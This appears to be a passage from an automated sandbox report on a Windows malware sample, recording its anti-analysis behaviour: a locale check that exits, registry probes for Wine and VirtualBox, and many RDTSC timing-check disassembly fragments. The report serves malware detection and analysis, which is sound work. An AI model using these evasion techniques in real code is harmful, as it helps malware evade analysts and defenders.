                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F29BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00F29BB0

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-36218
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE2F7 second address: 11FDB3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 pushad 0x0000000a sbb edx, 1121E984h 0x00000010 mov dword ptr [ebp+122D2A87h], ebx 0x00000016 popad 0x00000017 push dword ptr [ebp+122D01A5h] 0x0000001d pushad 0x0000001e mov edi, 24A4AE9Eh 0x00000023 mov cx, di 0x00000026 popad 0x00000027 call dword ptr [ebp+122D22DDh] 0x0000002d pushad 0x0000002e jmp 00007F0F04CBD323h 0x00000033 xor eax, eax 0x00000035 jng 00007F0F04CBD325h 0x0000003b mov edx, dword ptr [esp+28h] 0x0000003f js 00007F0F04CBD31Ch 0x00000045 xor dword ptr [ebp+122D2ACAh], edx 0x0000004b mov dword ptr [ebp+122D3820h], eax 0x00000051 jmp 00007F0F04CBD31Dh 0x00000056 mov esi, 0000003Ch 0x0000005b jmp 00007F0F04CBD327h 0x00000060 add esi, dword ptr [esp+24h] 0x00000064 xor dword ptr [ebp+122D1875h], edi 0x0000006a lodsw 0x0000006c sub dword ptr [ebp+122D1875h], esi 0x00000072 add eax, dword ptr [esp+24h] 0x00000076 cld 0x00000077 cmc 0x00000078 mov ebx, dword ptr [esp+24h] 0x0000007c jnl 00007F0F04CBD322h 0x00000082 push eax 0x00000083 pushad 0x00000084 push eax 0x00000085 push edx 0x00000086 push eax 0x00000087 push edx 0x00000088 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FDB3C second address: 11FDB40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137CBCF second address: 137CBD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137BAFF second address: 137BB03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137BB03 second address: 137BB1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD325h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137BB1E second address: 137BB23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137BC8F second address: 137BC95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137BC95 second address: 137BC9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137BC9B second address: 137BCA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F0F04CBD316h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137BCA7 second address: 137BCAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137BE12 second address: 137BE39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Ah 0x00000007 push esi 0x00000008 jmp 00007F0F04CBD328h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137C256 second address: 137C265 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0F0527E406h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137C265 second address: 137C26B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137C26B second address: 137C271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137DFA3 second address: 137DFB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F04CBD31Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137DFB1 second address: 137E01D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E40Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 3E88A8FCh 0x00000012 mov dword ptr [ebp+122D234Dh], edi 0x00000018 push 00000003h 0x0000001a mov ch, al 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebp 0x00000021 call 00007F0F0527E408h 0x00000026 pop ebp 0x00000027 mov dword ptr [esp+04h], ebp 0x0000002b add dword ptr [esp+04h], 0000001Ah 0x00000033 inc ebp 0x00000034 push ebp 0x00000035 ret 0x00000036 pop ebp 0x00000037 ret 0x00000038 jmp 00007F0F0527E415h 0x0000003d push 00000003h 0x0000003f mov si, A873h 0x00000043 push ABB3C9A3h 0x00000048 push edx 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137E01D second address: 137E048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 xor dword ptr [esp], 6BB3C9A3h 0x0000000d mov dword ptr [ebp+122D21E9h], ebx 0x00000013 lea ebx, dword ptr [ebp+12453E1Ah] 0x00000019 pushad 0x0000001a xor ah, 00000047h 0x0000001d popad 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 js 00007F0F04CBD316h 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137E0C0 second address: 137E0DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E416h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137E0DA second address: 137E0DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137E0DF second address: 137E0F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0F0527E406h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137E0F1 second address: 137E15D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop ecx 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F0F04CBD318h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 mov edi, dword ptr [ebp+122D3898h] 0x00000029 xor dx, E5B2h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007F0F04CBD318h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a mov edi, ebx 0x0000004c push A02F51E2h 0x00000051 push ebx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F0F04CBD31Ah 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137E15D second address: 137E1B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E40Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a add dword ptr [esp], 5FD0AE9Eh 0x00000011 push 00000003h 0x00000013 mov dword ptr [ebp+122D2AC3h], edx 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+122D2E07h], ecx 0x00000021 push 00000003h 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007F0F0527E408h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 00000018h 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d mov si, 2B17h 0x00000041 mov di, si 0x00000044 push A07DFA96h 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137E1B7 second address: 137E1BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137E29A second address: 137E2AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0F0527E40Dh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137E2AE second address: 137E322 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b pushad 0x0000000c mov ebx, dword ptr [ebp+122D3780h] 0x00000012 and edi, dword ptr [ebp+122D21E9h] 0x00000018 popad 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c mov edx, dword ptr [ebp+122D38A4h] 0x00000022 pop edi 0x00000023 push 7B65ECA4h 0x00000028 push esi 0x00000029 jnc 00007F0F04CBD318h 0x0000002f pop esi 0x00000030 xor dword ptr [esp], 7B65EC24h 0x00000037 jmp 00007F0F04CBD325h 0x0000003c xor edi, dword ptr [ebp+122D3A58h] 0x00000042 push 00000003h 0x00000044 mov edx, dword ptr [ebp+122D384Ch] 0x0000004a push 00000000h 0x0000004c push 00000003h 0x0000004e mov esi, dword ptr [ebp+122D379Ch] 0x00000054 call 00007F0F04CBD319h 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137E322 second address: 137E329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137E329 second address: 137E3BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD326h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0F04CBD31Ah 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F0F04CBD31Ah 0x00000018 mov eax, dword ptr [eax] 0x0000001a jmp 00007F0F04CBD322h 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 pushad 0x00000024 jmp 00007F0F04CBD329h 0x00000029 pushad 0x0000002a push ecx 0x0000002b pop ecx 0x0000002c pushad 0x0000002d popad 0x0000002e popad 0x0000002f popad 0x00000030 pop eax 0x00000031 mov dword ptr [ebp+122D2B3Ah], edx 0x00000037 lea ebx, dword ptr [ebp+12453E2Eh] 0x0000003d xor dword ptr [ebp+122D2A5Ch], esi 0x00000043 push eax 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F0F04CBD31Eh 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1390661 second address: 1390665 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139F198 second address: 139F1F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD328h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0F04CBD328h 0x0000000e jnp 00007F0F04CBD318h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push edi 0x00000017 jo 00007F0F04CBD316h 0x0000001d pop edi 0x0000001e popad 0x0000001f push ecx 0x00000020 jmp 00007F0F04CBD324h 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139D7FE second address: 139D804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139D804 second address: 139D808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139DBCF second address: 139DBD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139DD94 second address: 139DDA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Eh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139DDA8 second address: 139DDAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139DDAE second address: 139DDB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139E065 second address: 139E089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0F0527E418h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139E089 second address: 139E08D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1396515 second address: 1396519 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13714B4 second address: 13714BE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0F04CBD316h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139E33F second address: 139E353 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0F0527E40Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139E353 second address: 139E357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139E914 second address: 139E91A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139E91A second address: 139E921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139E921 second address: 139E93E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0F0527E411h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139E93E second address: 139E948 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0F04CBD316h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139EC11 second address: 139EC19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139EC19 second address: 139EC1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139EC1F second address: 139EC2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139ED6D second address: 139ED9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F0F04CBD325h 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jp 00007F0F04CBD316h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0F04CBD31Ch 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A25E9 second address: 13A25ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1368DB0 second address: 1368DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1374D0B second address: 1374D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AB8E8 second address: 13AB902 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0F04CBD324h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AB902 second address: 13AB906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ABBF8 second address: 13ABC2A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0F04CBD316h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 je 00007F0F04CBD316h 0x00000016 jmp 00007F0F04CBD31Ah 0x0000001b jl 00007F0F04CBD316h 0x00000021 popad 0x00000022 jmp 00007F0F04CBD31Bh 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ABEE6 second address: 13ABEEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AC1BA second address: 13AC1BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AC1BE second address: 13AC1C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AC1C6 second address: 13AC204 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F0F04CBD316h 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007F0F04CBD31Ch 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0F04CBD31Ch 0x0000001a jmp 00007F0F04CBD326h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AC204 second address: 13AC215 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F0F0527E406h 0x00000009 jnc 00007F0F0527E406h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AD7ED second address: 13AD7F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AD7F3 second address: 13AD7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ADD4A second address: 13ADD4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ADE1E second address: 13ADE24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ADEE6 second address: 13ADEEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ADEEE second address: 13ADF0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0F0527E406h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0F0527E40Eh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AE1A4 second address: 13AE1AE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0F04CBD316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AE1AE second address: 13AE1B8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0F0527E40Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AE1B8 second address: 13AE1C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F0F04CBD316h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AE1C8 second address: 13AE1CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AE299 second address: 13AE29D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AE371 second address: 13AE376 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AE99C second address: 13AE9A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AE9A0 second address: 13AE9B2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0F0527E406h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F0F0527E406h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AE9B2 second address: 13AE9B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AE9B6 second address: 13AEA21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F0F0527E408h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov esi, dword ptr [ebp+122D37D4h] 0x00000028 push 00000000h 0x0000002a mov dword ptr [ebp+122D2ABEh], edi 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007F0F0527E408h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 00000015h 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c mov dword ptr [ebp+122D3394h], ecx 0x00000052 sub dword ptr [ebp+122D2AE5h], edx 0x00000058 xchg eax, ebx 0x00000059 push ecx 0x0000005a jo 00007F0F0527E40Ch 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AEA21 second address: 13AEA2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
